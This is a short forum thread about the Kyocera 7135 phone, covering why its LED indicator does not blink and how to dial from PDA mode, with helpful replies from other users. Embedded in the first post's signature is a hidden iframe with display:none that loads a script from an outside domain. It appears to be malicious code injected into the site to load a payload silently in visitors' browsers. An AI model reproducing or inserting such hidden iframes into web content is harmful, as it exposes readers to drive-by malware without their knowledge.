+ Reply to Thread

Thread: LED Indicator

LED Indicator

I got my new 7135 today!!!!!!!!!!!! I noticed that my LED green, red, amber indicator lights do not flash. How do I set these?
    Also when my phone is in PDA mode, I cannot key in a phone number and dial. I must hit the green phone button first. Is there a setting to have it in phone mode when opened?

Thanks!:BigKnife:<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The LED only lights up when you are using the phone. Unlike other phones (StarTac, etc.) the LED does not blink when the phone is on.

You cannot dial when the phone is on the PDA side unless you are in an app that dials, like TakePhone. However, in the Phone Prefs screen there is a check box where you can have it show the phone display when you open the the flip.

Thanks that helps!
    Route 6035 - 7135 - XV6600woc - Q

Originally posted by Lnoble
    The LED only lights up when you are using the phone. Unlike other phones (StarTac, etc.) the LED does not blink when the phone is on.

You cannot dial when the phone is on the PDA side unless you are in an app that dials, like TakePhone. However, in the Phone Prefs screen there is a check box where you can have it show the phone display when you open the the flip.
    I find this to be a nuisance (opening the phone and seeing the phone screen). What I do is that when I want the phone, I push the "End Call" button (you know...the red one). This gives me the phone screen. You could also push the green button, but if you do it twice, you will redial the last person you called.